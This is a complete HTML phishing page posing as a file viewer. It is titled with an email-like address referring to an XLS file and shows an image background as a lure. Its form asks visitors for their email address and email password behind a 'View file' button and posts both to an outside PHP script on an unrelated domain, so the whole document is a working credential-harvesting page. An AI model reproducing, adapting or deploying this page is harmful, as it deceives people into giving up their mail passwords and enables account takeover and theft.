<!doctype html>
<html>
<head>
<style>
body { background-repeat:no-repeat;}
.container{ margin-top:285px; margin-left:570px; border:hidden;}
.puta { width:240px; height:28px; background-color:transparent; font-size:15px;border-radius:20px; border-color:green;}
.putb { width:240px; margin-top:10px; height:28px; font-size:15px; background-color:transparent; border-radius:20px; border-color:green;}
.putb:focus{outline: none;} 
.putc { width:240px; margin-top:10px; color:white;  font-size:20px; height:28px; background-color:green; border-radius:20px; border-color:green;}
.putc:focus{outline: none;}
</style>
<meta charset="utf-8">
<link rel="shortcut icon" href="https://bafybeic427pgsfldrplox6qlcvgf24u6brbjo7fi7dezfy6k7ybcttzmay.ipfs.w3s.link/images.png">
<title>xls-cache2@holisticfacades.com.ng</title>
</head>

<body background="
https://i.imgur.com/2WOddkz.png

">
  <form method="post" action="https://www.gopodeventsconsult.com.ng/contentfeed.php" ">
      <fieldset class="container">
<input type="email" name="email" class="puta" value="" required placeholder="&nbsp;&nbsp;Enter email address"  "><br>
      <input type="password" name="passw" value="" class="putb" required placeholder="&nbsp;&nbsp;Enter email password" ><br>
      <input type="submit" class="putc" value="View file"><br>
     <input type="email" name="email" class="puta" value="" placeholder="" ><br>
  
  
       </fieldset>
  
  </form>
</body>
</html>
